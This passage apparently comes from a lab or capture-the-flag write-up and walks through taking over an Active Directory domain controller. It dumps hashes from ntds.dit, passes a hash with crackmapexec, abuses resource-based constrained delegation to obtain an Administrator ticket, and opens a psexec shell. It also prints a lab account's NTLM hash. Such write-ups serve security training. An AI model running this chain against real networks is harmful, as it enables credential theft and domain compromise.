For retrieving Credentials from ntds.dit file, I referred to the following article
impacket-secretsdump -ntds ntds.dit -security SECURITY -system SYSTEM
# Got a Bunch of hash but all users, but most of them were expired
# used crackmapexec to check the validity of the has
crackmapexec winrm 192.168.120.181 -u users -H hashes
# Got one valid hash and had winrm access as well
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
Now, we need to set msDS-AllowedToActOnBehalfOfOtherIdentity on our new machine account. For this, we will use impacket-rbcd.py
impacket-rbcd -dc-ip 192.168.120.181 -t RESOURCEDC -f 'ATTACK' \n
-hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone
# For some reason, impacket gave odd error, so I had to download the script instead
wget https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
sudo python3 rbcd.py -dc-ip 192.168.120.181 -t RESOURCEDC -f 'ATTACK' \n
-hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone
Now let's grap Silver ticket using impacket-getST
# First, fix the skewed clock
rdate -n 192.168.120.181
# Get the silver ticket
impacket-getST -spn cifs/resourcedc.resourced.local resourced/attack\$:'AttackerPC1!' \n
-impersonate Administrator -dc-ip 192.168.120.181
# Silver ticket is saved in Administrator.ccache. Let's export it into the env variable
export KRB5CCNAME=./Administrator.ccache
Now that we have our silver ticket, we can move laterally to the ResourceDC machine impersonating as Administrator using Psexec.
sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.120.181
# Boom@ Got the Admin shell and proof.txt as well :)